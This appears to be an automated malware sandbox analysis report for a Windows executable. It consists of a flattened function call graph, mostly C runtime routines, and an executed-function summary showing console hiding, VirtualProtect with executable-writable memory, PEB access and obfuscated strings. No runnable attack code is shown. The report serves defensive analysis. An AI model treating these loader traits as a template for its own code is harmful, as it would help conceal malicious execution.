d0405f 7643->7644 7644->7616 7646 d03345 9 API calls 7645->7646 7647 d0409f 7646->7647 7647->7627 7649 d03345 9 API calls 7648->7649 7650 d040bf 7649->7650 7650->7638 7877 26a400 7880 26a41e 7877->7880 7879 26a416 7881 26a423 7880->7881 7883 26a4b8 7881->7883 7885 26ac73 7881->7885 7883->7879 7886 26ac90 DecodePointer 7885->7886 7887 26aca0 7885->7887 7886->7887 7888 26ad2d 7887->7888 7891 26ad22 7887->7891 7893 26acd7 7887->7893 7888->7891 7892 26501f __dosmaperr 20 API calls 7888->7892 7889 2629bb _ValidateLocalCookies 5 API calls 7890 26a64f 7889->7890 7890->7879 7891->7889 7892->7891 7893->7891 7894 26501f __dosmaperr 20 API calls 7893->7894 7894->7891 7895 268300 7896 268339 7895->7896 7897 26833d 7896->7897 7908 268365 7896->7908 7898 26501f __dosmaperr 20 API calls 7897->7898 7899 268342 7898->7899 7901 264f63 _abort 26 API calls 7899->7901 7900 268689 7902 2629bb _ValidateLocalCookies 5 API calls 7900->7902 7903 26834d 7901->7903 7904 268696 7902->7904 7905 2629bb _ValidateLocalCookies 5 API calls 7903->7905 7906 268359 7905->7906 7908->7900 7909 268220 7908->7909 7912 26823b 7909->7912 7910 2629bb _ValidateLocalCookies 5 API calls 7911 2682b2 7910->7911 7911->7908 7912->7910 8215 264540 8216 26454f 8215->8216 8220 264563 8215->8220 8218 264676 ___free_lconv_mon 20 API calls 8216->8218 8216->8220 8217 264676 ___free_lconv_mon 20 API calls 8219 264575 8217->8219 8218->8220 8221 264676 ___free_lconv_mon 20 API calls 8219->8221 8220->8217 8222 264588 8221->8222 8223 264676 ___free_lconv_mon 20 API calls 8222->8223 8224 264599 8223->8224 8225 264676 ___free_lconv_mon 20 API calls 8224->8225 8226 2645aa 8225->8226 8227 263340 RtlUnwind 8322 269f81 8323 269fa1 8322->8323 8326 269fd8 8323->8326 8325 269fcb 8327 269fdf 8326->8327 8328 269fff 8327->8328 8329 26a040 8327->8329 8330 26ab2e 8328->8330 8333 26ac37 21 API calls 8328->8333 8329->8330 8331 26ac37 21 API calls 8329->8331 8330->8325 8332 26a08e 8331->8332 8332->8325 8334 26ab5e 8333->8334 8334->8325 8564 2621cf 8567 263477 8564->8567 8568 264cce _abort 20 API calls 8567->8568 8571 26348e 8568->8571 8569 2629bb _ValidateLocalCookies 5 API calls 8570 2621e0 8569->8570 8571->8569 8572 2680cc 8582 268e35 8572->8582 8576 2680d9 8595 269111 8576->8595 8579 268103 8580 264676 ___free_lconv_mon 20 API calls 8579->8580 8581 26810e 8580->8581 8599 268e3e 8582->8599 8584 2680d4 8585 269071 8584->8585 8586 26907d ___scrt_is_nonwritable_in_current_image 8585->8586 8619 2661a3 EnterCriticalSection 8586->8619 8588 2690f3 8633 269108 8588->8633 8590 269088 8590->8588 8592 2690c7 DeleteCriticalSection 8590->8592 8620 26a2bc 8590->8620 8591 2690ff ___scrt_is_nonwritable_in_current_image 8591->8576 8593 264676 ___free_lconv_mon 20 API calls 8592->8593 8593->8590 8596 269127 8595->8596 8598 2680e8 DeleteCriticalSection 8595->8598 8597 264676 ___free_lconv_mon 20 API calls 8596->8597 8596->8598 8597->8598 8598->8576 8598->8579 8600 268e4a ___scrt_is_nonwritable_in_current_image 8599->8600 8609 2661a3 EnterCriticalSection 8600->8609 8602 268eed 8614 268f0d 8602->8614 8606 268e59 8606->8602 8608 268dee 66 API calls 8606->8608 8610 268118 EnterCriticalSection 8606->8610 8611 268ee3 8606->8611 8607 268ef9 ___scrt_is_nonwritable_in_current_image 8607->8584 8608->8606 8609->8606 8610->8606 8617 26812c LeaveCriticalSection 8611->8617 8613 268eeb 8613->8606 8618 2661eb LeaveCriticalSection 8614->8618 8616 268f14 8616->8607 8617->8613 8618->8616 8619->8590 8621 26a2c8 ___scrt_is_nonwritable_in_current_image 8620->8621 8622 26a2ee 8621->8622 8623 26a2d9 8621->8623 8632 26a2e9 ___scrt_is_nonwritable_in_current_image 8622->8632 8636 268118 EnterCriticalSection 8622->8636 8624 26501f __dosmaperr 20 API calls 8623->8624 8625 26a2de 8624->8625 8627 264f63 _abort 26 API calls 8625->8627 8627->8632 8628 26a30a 8637 26a246 8628->8637 8630 26a315 8653 26a332 8630->8653 8632->8590 8901 2661eb LeaveCriticalSection 8633->8901 8635 26910f 8635->8591 8636->8628 8638 26a253 8637->8638 8639 26a268 8637->8639 8640 26501f __dosmaperr 20 API calls 8638->8640 8651 26a263 8639->8651 8656 268d88 8639->8656 8642 26a258 8640->8642 8644 264f63 _abort 26 API calls 8642->8644 8644->8651 8645 269111 20 API calls 8646 26a284 8645->8646 8662 267fde 8646->8662 8648 26a28a 8669 26afee 8648->8669 8651->8630 8652 264676 ___free_lconv_mon 20 API calls 8652->8651 8900 26812c LeaveCriticalSection 8653->8900 8655 26a33a 8655->8632 8657 268da0 8656->8657 8658 268d9c 8656->8658 8657->8658 8659 267fde 26 API calls 8657->8659 8658->8645 8660 268dc0 8659->8660 8684 269c3d 8660->8684 8663 267fff 8662->8663 8664 267fea 8662->8664 8663->8648 8665 26501f __dosmaperr 20 API calls 8664->8665 8666 267fef 8665->8666 8667 264f63 _abort 26 API calls 8666->8667 8668 267ffa 8667->8668 8668->8648 8670 26b012 8669->8670 8671 26affd 8669->8671 8672 26b04d 8670->8672 8677 26b039 8670->8677 8673 26500c __dosmaperr 20 API calls 8671->8673 8675 26500c __dosmaperr 20 API calls 8672->8675 8674 26b002 8673->8674 8676 26501f __dosmaperr 20 API calls 8674->8676 8678 26b052 8675->8678 8681 26a290 8676->8681 8857 26afc6 8677->8857 8680 26501f __dosmaperr 20 API calls 8678->8680 8682 26b05a 8680->8682 8681->8651 8681->8652 8683 264f63 _abort 26 API calls 8682->8683 8683->8681 8685 269c49 ___scrt_is_nonwritable_in_current_image 8684->8685 8686 269c51 8685->8686 8690 269c69 8685->8690 8709 26500c 8686->8709 8687 269d07 8689 26500c __dosmaperr 20 API calls 8687->8689 8692 269d0c 8689->8692 8690->8687 8693 269c9e 8690->8693 8695 26501f __dosmaperr 20 API calls 8692->8695 8712 266872 EnterCriticalSection 8693->8712 8694 26501f __dosmaperr 20 API calls 8703 269c5e ___scrt_is_nonwritable_in_current_image 8694->8703 8697 269d14 8695->8697 8699 264f63 _abort 26 API calls 8697->8699 8698 269ca4 8700 269cd5 8698->8700 8701 269cc0 8698->8701 8699->8703 8713 269d28 8700->8713 8702 26501f __dosmaperr 20 API calls 8701->8702 8705 269cc5 8702->8705 8703->8658 8707 26500c __dosmaperr 20 API calls 8705->8707 8706 269cd0 8764 269cff 8706->8764 8707->8706 8710 264cce _abort 20 API calls 8709->8710 8711 265011 8710->8711 8711->8694 8712->8698 8714 269d56 8713->8714 8751 269d4f 8713->8751 8715 269d5a 8714->8715 8716 269d79 8714->8716 8718 26500c __dosmaperr 20 API calls 8715->8718 8719 269dca 8716->8719 8720 269dad 8716->8720 8717 2629bb _ValidateLocalCookies 5 API calls 8721 269f30 8717->8721 8722 269d5f 8718->8722 8723 269de0 8719->8723 8767 26a22b 8719->8767 8725 26500c __dosmaperr 20 API calls 8720->8725 8721->8706 8724 26501f __dosmaperr 20 API calls 8722->8724 8770 2698cd 8723->8770 8727 269d66 8724->8727 8729 269db2 8725->8729 8730 264f63 _abort 26 API calls 8727->8730 8732 26501f __dosmaperr 20 API calls 8729->8732 8730->8751 8735 269dba 8732->8735 8733 269e27 8736 269e81 WriteFile 8733->8736 8737 269e3b 8733->8737 8734 269dee 8738 269e14 8734->8738 8739 269df2 8734->8739 8740 264f63 _abort 26 API calls 8735->8740 8744 269ea4 GetLastError 8736->8744 8750 269e0a 8736->8750 8741 269e43 8737->8741 8742 269e71 8737->8742 8782 2696ad GetConsoleCP 8738->8782 8743 269ee8 8739->8743 8777 269860 8739->8777 8740->8751 8746 269e61 8741->8746 8747 269e48 8741->8747 8808 269943 8742->8808 8743->8751 8753 26501f __dosmaperr 20 API calls 8743->8753 8744->8750 8800 269b10 8746->8800 8747->8743 8793 269a22 8747->8793 8750->8743 8750->8751 8755 269ec4 8750->8755 8751->8717 8754 269f0d 8753->8754 8757 26500c __dosmaperr 20 API calls 8754->8757 8758 269edf 8755->8758 8759 269ecb 8755->8759 8757->8751 8815 264fe9 8758->8815 8760 26501f __dosmaperr 20 API calls 8759->8760 8762 269ed0 8760->8762 8763 26500c __dosmaperr 20 API calls 8762->8763 8763->8751 8856 266895 LeaveCriticalSection 8764->8856 8766 269d05 8766->8703 8820 26a1ad 8767->8820 8842 268d32 8770->8842 8772 2698dd 8773 2698e2 8772->8773 8774 264c4a _abort 38 API calls 8772->8774 8773->8733 8773->8734 8775 269905 8774->8775 8775->8773 8776 269923 GetConsoleMode 8775->8776 8776->8773 8778 2698ba 8777->8778 8781 269885 8777->8781 8778->8750 8779 26a3a1 WriteConsoleW CreateFileW 8779->8781 8780 2698bc GetLastError 8780->8778 8781->8778 8781->8779 8781->8780 8787 269822 8782->8787 8791 269710 8782->8791 8783 2629bb _ValidateLocalCookies 5 API calls 8784 26985c 8783->8784 8784->8750 8786 267f6a 40 API calls __fassign 8786->8791 8787->8783 8788 269796 WideCharToMultiByte 8788->8787 8789 2697bc WriteFile 8788->8789 8790 269845 GetLastError 8789->8790 8789->8791 8790->8787 8791->8786 8791->8787 8791->8788 8792 2697ed WriteFile 8791->8792 8851 266ba1 8791->8851 8792->8790 8792->8791 8794 269a31 8793->8794 8795 269af3 8794->8795 8797 269aaf WriteFile 8794->8797 8796 2629bb _ValidateLocalCookies 5 API calls 8795->8796 8799 269b0c 8796->8799 8797->8794 8798 269af5 GetLastError 8797->8798 8798->8795 8799->8750 8807 269b1f 8800->8807 8801 269c2a 8802 2629bb _ValidateLocalCookies 5 API calls 8801->8802 8803 269c39 8802->8803 8803->8750 8804 269ba1 WideCharToMultiByte 8805 269bd6 WriteFile 8804->8805 8806 269c22 GetLastError 8804->8806 8805->8806 8805->8807 8806->8801 8807->8801 8807->8804 8807->8805 8810 269952 8808->8810 8809 269a05 8812 2629bb _ValidateLocalCookies 5 API calls 8809->8812 8810->8809 8811 2699c4 WriteFile 8810->8811 8811->8810 8813 269a07 GetLastError 8811->8813 8814 269a1e 8812->8814 8813->8809 8814->8750 8816 26500c __dosmaperr 20 API calls 8815->8816 8817 264ff4 __dosmaperr 8816->8817 8818 26501f __dosmaperr 20 API calls 8817->8818 8819 265007 8818->8819 8819->8751 8829 266949 8820->8829 8822 26a1bf 8823 26a1c7 8822->8823 8824 26a1d8 SetFilePointerEx 8822->8824 8825 26501f __dosmaperr 20 API calls 8823->8825 8826 26a1f0 GetLastError 8824->8826 8828 26a1cc 8824->8828 8825->8828 8827 264fe9 __dosmaperr 20 API calls 8826->8827 8827->8828 8828->8723 8830 266956 8829->8830 8831 26696b 8829->8831 8832 26500c __dosmaperr 20 API calls 8830->8832 8834 26500c __dosmaperr 20 API calls 8831->8834 8836 266990 8831->8836 8833 26695b 8832->8833 8835 26501f __dosmaperr 20 API calls 8833->8835 8837 26699b 8834->8837 8839 266963 8835->8839 8836->8822 8838 26501f __dosmaperr 20 API calls 8837->8838 8840 2669a3 8838->8840 8839->8822 8841 264f63 _abort 26 API calls 8840->8841 8841->8839 8843 268d3f 8842->8843 8844 268d4c 8842->8844 8845 26501f __dosmaperr 20 API calls 8843->8845 8846 26501f __dosmaperr 20 API calls 8844->8846 8847 268d58 8844->8847 8849 268d44 8845->8849 8848 268d79 8846->8848 8847->8772 8850 264f63 _abort 26 API calls 8848->8850 8849->8772 8850->8849 8852 264c4a _abort 38 API calls 8851->8852 8853 266bac 8852->8853 8854 267f84 __fassign 38 API calls 8853->8854 8855 266bbc 8854->8855 8855->8791 8856->8766 8860 26af44 8857->8860 8859 26afea 8859->8681 8861 26af50 ___scrt_is_nonwritable_in_current_image 8860->8861 8871 266872 EnterCriticalSection 8861->8871 8863 26af5e 8864 26af85 8863->8864 8865 26af90 8863->8865 8872 26b06d 8864->8872 8867 26501f __dosmaperr 20 API calls 8865->8867 8868 26af8b 8867->8868 8887 26afba 8868->8887 8870 26afad ___scrt_is_nonwritable_in_current_image 8870->8859 8871->8863 8873 266949 26 API calls 8872->8873 8876 26b07d 8873->8876 8874 26b083 8890 2668b8 8874->8890 8876->8874 8877 26b0b5 8876->8877 8878 266949 26 API calls 8876->8878 8877->8874 8879 266949 26 API calls 8877->8879 8881 26b0ac 8878->8881 8882 26b0c1 CloseHandle 8879->8882 8884 266949 26 API calls 8881->8884 8882->8874 8885 26b0cd GetLastError 8882->8885 8883 26b0fd 8883->8868 8884->8877 8885->8874 8886 264fe9 __dosmaperr 20 API calls 8886->8883 8899 266895 LeaveCriticalSection 8887->8899 8889 26afc4 8889->8870 8891 26692e 8890->8891 8893 2668c7 8890->8893 8892 26501f __dosmaperr 20 API calls 8891->8892 8894 266933 8892->8894 8893->8891 8898 2668f1 8893->8898 8895 26500c __dosmaperr 20 API calls 8894->8895 8896 26691e 8895->8896 8896->8883 8896->8886 8897 266918 SetStdHandle 8897->8896 8898->8896 8898->8897 8899->8889 8900->8655 8901->8635 8228 26504a 8229 26505a 8228->8229 8238 265070 8228->8238 8230 26501f __dosmaperr 20 API calls 8229->8230 8231 26505f 8230->8231 8232 264f63 _abort 26 API calls 8231->8232 8234 265069 8232->8234 8235 2650da 8235->8235 8258 263923 8235->8258 8236 265148 8240 264676 ___free_lconv_mon 20 API calls 8236->8240 8238->8235 8241 2651bb 8238->8241 8247 2651da 8238->8247 8239 26513f 8239->8236 8244 2651cd 8239->8244 8264 26874b 8239->8264 8240->8241 8273 2653f4 8241->8273 8245 264f73 _abort 11 API calls 8244->8245 8246 2651d9 8245->8246 8248 2651e6 8247->8248 8249 26479b _abort 20 API calls 8248->8249 8250 265214 8249->8250 8251 26874b 26 API calls 8250->8251 8252 265240 8251->8252 8253 264f73 _abort 11 API calls 8252->8253 8254 26526f ___scrt_fastfail 8253->8254 8255 265310 FindFirstFileExA 8254->8255 8256 26535f 8255->8256 8257 2651da 26 API calls 8256->8257 8259 263938 8258->8259 8260 263934 8258->8260 8259->8260 8261 26479b _abort 20 API calls 8259->8261 8260->8239 8262 263966 8261->8262 8263 264676 ___free_lconv_mon 20 API calls 8262->8263 8263->8260 8267 26869a 8264->8267 8265 2686af 8266 26501f __dosmaperr 20 API calls 8265->8266 8268 2686b4 8265->8268 8272 2686da 8266->8272 8267->8265 8267->8268 8270 2686eb 8267->8270 8268->8239 8269 264f63 _abort 26 API calls 8269->8268 8270->8268 8271 26501f __dosmaperr 20 API calls 8270->8271 8271->8272 8272->8269 8274 2653fe 8273->8274 8275 26540e 8274->8275 8277 264676 ___free_lconv_mon 20 API calls 8274->8277 8276 264676 ___free_lconv_mon 20 API calls 8275->8276 8278 265415 8276->8278 8277->8274 8278->8234 8335 26368a 8336 2636b5 8335->8336 8337 263699 8335->8337 8339 2659ba 51 API calls 8336->8339 8337->8336 8338 26369f 8337->8338 8341 26501f __dosmaperr 20 API calls 8338->8341 8340 2636bc GetModuleFileNameA 8339->8340 8342 2636e0 8340->8342 8343 2636a4 8341->8343 8358 2637ae 8342->8358 8344 264f63 _abort 26 API calls 8343->8344 8346 2636ae 8344->8346 8348 263923 20 API calls 8349 26370a 8348->8349 8350 263713 8349->8350 8351 26371f 8349->8351 8352 26501f __dosmaperr 20 API calls 8350->8352 8353 2637ae 38 API calls 8351->8353 8357 263718 8352->8357 8354 263735 8353->8354 8356 264676 ___free_lconv_mon 20 API calls 8354->8356 8354->8357 8355 264676 ___free_lconv_mon 20 API calls 8355->8346 8356->8357 8357->8355 8360 2637d3 8358->8360 8362 263833 8360->8362 8364 265d45 8360->8364 8361 2636fd 8361->8348 8362->8361 8363 265d45 38 API calls 8362->8363 8363->8362 8367 265cec 8364->8367 8368 2647f8 __fassign 38 API calls 8367->8368 8369 265d00 8368->8369 8369->8360 8902 263bca 8903 263be2 8902->8903 8904 263bdc 8902->8904 8905 263adc 20 API calls 8904->8905 8905->8903 8370 26ae8b 8371 26aea4 __startOneArgErrorHandling 8370->8371 8373 26aecd __startOneArgErrorHandling 8371->8373 8374 26b464 8371->8374 8375 26b49d __startOneArgErrorHandling 8374->8375 8376 26b735 __raise_exc RaiseException 8375->8376 8377 26b4c4 __startOneArgErrorHandling 8375->8377 8376->8377 8378 26b507 8377->8378 8380 26b4e2 8377->8380 8379 26ba26 __startOneArgErrorHandling 20 API calls 8378->8379 8382 26b502 __startOneArgErrorHandling 8379->8382 8385 26ba55 8380->8385 8383 2629bb _ValidateLocalCookies 5 API calls 8382->8383 8384 26b52b 8383->8384 8384->8373 8386 26ba64 8385->8386 8387 26ba83 __startOneArgErrorHandling 8386->8387 8388 26bad8 __startOneArgErrorHandling 8386->8388 8390 26362c __startOneArgErrorHandling 5 API calls 8387->8390 8389 26ba26 __startOneArgErrorHandling 20 API calls 8388->8389 8393 26bad1 8389->8393 8391 26bac4 8390->8391 8392 26ba26 __startOneArgErrorHandling 20 API calls 8391->8392 8391->8393 8392->8393 8393->8382 7913 265e17 7914 265e27 7913->7914 7917 265e37 ___from_strstr_to_strchr 7913->7917 7915 26501f __dosmaperr 20 API calls 7914->7915 7916 265e2c 7915->7916 7918 265e9a 7917->7918 7921 265e6e 7917->7921 7959 266052 7917->7959 7919 26501f __dosmaperr 20 API calls 7918->7919 7920 265e9f 7919->7920 7925 264676 ___free_lconv_mon 20 API calls 7920->7925 7924 265eb8 7921->7924 7927 265e91 7921->7927 7946 265efd 7921->7946 7924->7920 7928 26479b _abort 20 API calls 7924->7928 7925->7916 7927->7918 7927->7946 7930 265ec9 7928->7930 7929 265f2d 7931 264676 ___free_lconv_mon 20 API calls 7929->7931 7932 264676 ___free_lconv_mon 20 API calls 7930->7932 7934 265f35 7931->7934 7935 265ed4 7932->7935 7933 265f71 7933->7920 7936 26731c __onexit 29 API calls 7933->7936 7942 265f3e 7934->7942 7978 26731c 7934->7978 7935->7920 7940 26479b _abort 20 API calls 7935->7940 7935->7946 7937 265f9f 7936->7937 7939 264676 ___free_lconv_mon 20 API calls 7937->7939 7939->7942 7941 265ef2 7940->7941 7944 264676 ___free_lconv_mon 20 API calls 7941->7944 7942->7920 7942->7942 7947 26479b _abort 20 API calls 7942->7947 7943 265f5e 7945 264676 ___free_lconv_mon 20 API calls 7943->7945 7944->7946 7945->7942 7946->7920 7974 266103 7946->7974 7948 265fec 7947->7948 7949 266032 7948->7949 7950 2646fe 26 API calls 7948->7950 7951 264676 ___free_lconv_mon 20 API calls 7949->7951 7952 266000 7950->7952 7951->7920 7953 266047 7952->7953 7954 266007 SetEnvironmentVariableA 7952->7954 7955 264f73 _abort 11 API calls 7953->7955 7954->7949 7956 26602d 7954->7956 7957 266051 7955->7957 7958 26501f __dosmaperr 20 API calls 7956->7958 7958->7949 7960 266067 7959->7960 7961 266060 7959->7961 7962 26479b _abort 20 API calls 7960->7962 7961->7921 7964 266084 7962->7964 7963 2660f1 7965 264758 _abort 38 API calls 7963->7965 7964->7963 7967 2660f6 7964->7967 7970 26479b _abort 20 API calls 7964->7970 7971 264676 ___free_lconv_mon 20 API calls 7964->7971 7972 2646fe 26 API calls 7964->7972 7973 2660e0 7964->7973 7965->7967 7966 264676 ___free_lconv_mon 20 API calls 7966->7961 7968 264f73 _abort 11 API calls 7967->7968 7969 266102 7968->7969 7970->7964 7971->7964 7972->7964 7973->7966 7975 265f20 7974->7975 7977 266118 7974->7977 7975->7929 7975->7933 7977->7975 7987 268abb 7977->7987 7979 267327 7978->7979 7980 26734f 7979->7980 7982 267340 7979->7982 7981 26735e 7980->7981 8079 268c96 7980->8079 8086 268cc9 7981->8086 7984 26501f __dosmaperr 20 API calls 7982->7984 7986 267345 ___scrt_fastfail 7984->7986 7986->7943 7988 268acf 7987->7988 7993 268ac9 7987->7993 8004 268ae4 7988->8004 7991 2691ba 8024 2691d7 7991->8024 7993->7991 7994 26917f 7993->7994 7996 26919c 7993->7996 7995 26501f __dosmaperr 20 API calls 7994->7995 7997 269184 7995->7997 7996->7991 7998 2691a6 7996->7998 7999 264f63 _abort 26 API calls 7997->7999 8000 26501f __dosmaperr 20 API calls 7998->8000 8003 26918f 7999->8003 8001 2691ab 8000->8001 8002 264f63 _abort 26 API calls 8001->8002 8002->8003 8003->7977 8005 2647f8 __fassign 38 API calls 8004->8005 8006 268afa 8005->8006 8007 268b16 8006->8007 8008 268adf 8006->8008 8009 268b2d 8006->8009 8010 26501f __dosmaperr 20 API calls 8007->8010 8008->7977 8012 268b36 8009->8012 8013 268b48 8009->8013 8011 268b1b 8010->8011 8017 264f63 _abort 26 API calls 8011->8017 8014 26501f __dosmaperr 20 API calls 8012->8014 8015 268b55 8013->8015 8016 268b68 8013->8016 8018 268b3b 8014->8018 8019 2691d7 46 API calls 8015->8019 8035 269536 8016->8035 8017->8008 8021 264f63 _abort 26 API calls 8018->8021 8019->8008 8021->8008 8023 26501f __dosmaperr 20 API calls 8023->8008 8025 269221 ___ascii_strnicmp 8024->8025 8026 2691e9 8024->8026 8025->8003 8027 2647f8 __fassign 38 API calls 8026->8027 8029 2691f7 8027->8029 8028 269211 8030 26501f __dosmaperr 20 API calls 8028->8030 8029->8028 8034 269223 8029->8034 8031 269216 8030->8031 8032 264f63 _abort 26 API calls 8031->8032 8032->8025 8033 267e56 46 API calls 8033->8034 8034->8025 8034->8033 8036 2647f8 __fassign 38 API calls 8035->8036 8037 269549 8036->8037 8040 26928e 8037->8040 8043 2692c2 8040->8043 8041 2629bb _ValidateLocalCookies 5 API calls 8042 268b7e 8041->8042 8042->8008 8042->8023 8044 2693b0 MultiByteToWideChar 8043->8044 8046 269335 GetCPInfo 8043->8046 8051 2692e9 8043->8051 8045 2693ce 8044->8045 8044->8051 8048 2646b0 __onexit 21 API calls 8045->8048 8052 2693ef __alloca_probe_16 8045->8052 8047 269344 8046->8047 8046->8051 8047->8044 8047->8051 8048->8052 8049 269513 8054 266f6b __freea 20 API calls 8049->8054 8050 269442 MultiByteToWideChar 8050->8049 8053 26945e MultiByteToWideChar 8050->8053 8051->8041 8052->8049 8052->8050 8053->8049 8055 269478 8053->8055 8054->8051 8056 2646b0 __onexit 21 API calls 8055->8056 8059 269499 __alloca_probe_16 8055->8059 8056->8059 8057 2694d6 MultiByteToWideChar 8058 269506 8057->8058 8060 2694ed 8057->8060 8062 266f6b __freea 20 API calls 8058->8062 8059->8057 8059->8058 8063 266333 8060->8063 8062->8049 8071 266202 8063->8071 8068 26634f 8069 2629bb _ValidateLocalCookies 5 API calls 8068->8069 8070 2663a1 8069->8070 8070->8058 8072 26621c _abort 5 API calls 8071->8072 8073 266218 8072->8073 8073->8068 8074 2665ec 8073->8074 8075 26621c _abort 5 API calls 8074->8075 8076 266613 8075->8076 8077 2629bb _ValidateLocalCookies 5 API calls 8076->8077 8078 26638f CompareStringW 8077->8078 8078->8068 8080 268cb6 HeapSize 8079->8080 8081 268ca1 8079->8081 8080->7981 8082 26501f __dosmaperr 20 API calls 8081->8082 8083 268ca6 8082->8083 8084 264f63 _abort 26 API calls 8083->8084 8085 268cb1 8084->8085 8085->7981 8087 268cd6 8086->8087 8088 268ce1 8086->8088 8089 2646b0 __onexit 21 API calls 8087->8089 8090 268ce9 8088->8090 8096 268cf2 _abort 8088->8096 8094 268cde 8089->8094 8091 264676 ___free_lconv_mon 20 API calls 8090->8091 8091->8094 8092 268cf7 8095 26501f __dosmaperr 20 API calls 8092->8095 8093 268d1c HeapReAlloc 8093->8094 8093->8096 8094->7986 8095->8094 8096->8092 8096->8093 8097 2674c4 _abort 7 API calls 8096->8097 8097->8096 8394 267394 GetProcessHeap 7315 262092 7320 2626fa SetUnhandledExceptionFilter 7315->7320 7317 262097 pre_c_initialization 7321 2640a7 7317->7321 7319 2620a2 7320->7317 7322 2640b3 7321->7322 7323 2640cd 7321->7323 7322->7323 7324 26501f __dosmaperr 20 API calls 7322->7324 7323->7319 7325 2640bd 7324->7325 7326 264f63 _abort 26 API calls 7325->7326 7327 2640c8 7326->7327 7327->7319 8098 262212 8101 262484 8098->8101 8100 262217 8100->8100 8102 2624a7 8101->8102 8103 2624b4 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8101->8103 8102->8103 8104 2624ab 8102->8104 8103->8104 8104->8100 8279 264d53 8287 2663a7 8279->8287 8282 264d67 8283 264cce _abort 20 API calls 8284 264d6f 8283->8284 8285 264d7c 8284->8285 8294 264d7f 8284->8294 8288 26621c _abort 5 API calls 8287->8288 8289 2663ce 8288->8289 8290 2663e6 TlsAlloc 8289->8290 8293 2663d7 8289->8293 8290->8293 8291 2629bb _ValidateLocalCookies 5 API calls 8292 264d5d 8291->8292 8292->8282 8292->8283 8293->8291 8295 264d8f 8294->8295 8296 264d89 8294->8296 8295->8282 8298 2663fd 8296->8298 8299 26621c _abort 5 API calls 8298->8299 8300 266424 8299->8300 8301 26643c TlsFree 8300->8301 8302 266430 8300->8302 8301->8302 8303 2629bb _ValidateLocalCookies 5 API calls 8302->8303 8304 26644d 8303->8304 8304->8295 8395 d03765 8396 d03792 8395->8396 8397 d00005 GetPEB 8396->8397 8398 d0379e 8397->8398 8399 d04675 GetPEB 8398->8399 8400 d037b1 8399->8400 8401 d037b9 8400->8401 8402 d0386f 8400->8402 8403 d03345 9 API calls 8401->8403 8406 d04035 8402->8406 8405 d0384f 8403->8405 8407 d03345 9 API calls 8406->8407 8408 d0403f 8407->8408 8408->8405 8906 262ed0 8907 262ee2 8906->8907 8909 262ef0 @_EH4_CallFilterFunc@8 8906->8909 8908 2629bb _ValidateLocalCookies 5 API calls 8907->8908 8908->8909 8409 26a091 8410 26a0b5 8409->8410 8411 26a0ce 8410->8411 8413 26ae8b __startOneArgErrorHandling 8410->8413 8412 26ac73 21 API calls 8411->8412 8414 26a118 8411->8414 8412->8414 8415 26b464 21 API calls 8413->8415 8416 26aecd __startOneArgErrorHandling 8413->8416 8415->8416 8417 262f9f 8418 262fb6 8417->8418 8419 262fa9 8417->8419 8419->8418 8420 264676 ___free_lconv_mon 20 API calls 8419->8420 8420->8418 8105 265419 8110 26544e 8105->8110 8108 265435 8109 264676 ___free_lconv_mon 20 API calls 8109->8108 8111 265460 8110->8111 8112 265427 8110->8112 8113 265465 8111->8113 8114 265490 8111->8114 8112->8108 8112->8109 8115 26479b _abort 20 API calls 8113->8115 8114->8112 8116 26731c __onexit 29 API calls 8114->8116 8117 26546e 8115->8117 8118 2654ab 8116->8118 8119 264676 ___free_lconv_mon 20 API calls 8117->8119 8120 264676 ___free_lconv_mon 20 API calls 8118->8120 8119->8112 8120->8112

        Executed Functions

        Function 00261000 Relevance: 32.3, APIs: 3, Strings: 15, Instructions: 845memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • GetConsoleWindow.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000080), ref: 002616FA
        • SetWindowPos.USER32(00000000), ref: 00261701
        • VirtualProtect.KERNELBASE(32342DD0,000002E2,00000040,?), ref: 00261EE2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: Window$ConsoleProtectVirtual
        • String ID: s=$,52$-9$0852$952$99_1$99cb$99fd$99fd$9S1Z$9obc$S=]2$gJ0xZISNT1QdY$oS2Z$M,=
        • API String ID: 2778018546-69423270
        • Opcode ID: 74864227211106a3b77f37cab878b13b7fa1d5f96a3d637c62092114488ae3dd
        • Instruction ID: 804441e8564c106b41cd610dd3b247decf1c9d8717c3a8d3919b555ce14a4b21
        • Opcode Fuzzy Hash: 74864227211106a3b77f37cab878b13b7fa1d5f96a3d637c62092114488ae3dd
        • Instruction Fuzzy Hash: 8D7299B2B5435A8BEB60CFB9DDC938ABAB0F715300F4445B8D548EB785D7789A858F00
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002626FA Relevance: 1.5, APIs: 1, Instructions: 3COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 450 2626fa-262705 SetUnhandledExceptionFilter
        C-Code - Quality: 100%
        			E002626FA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00262706); // executed
				return _t1;
			}




        0x002626ff
        0x00262705

        APIs
        • SetUnhandledExceptionFilter.KERNELBASE(Function_00002706,00262097), ref: 002626FF
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
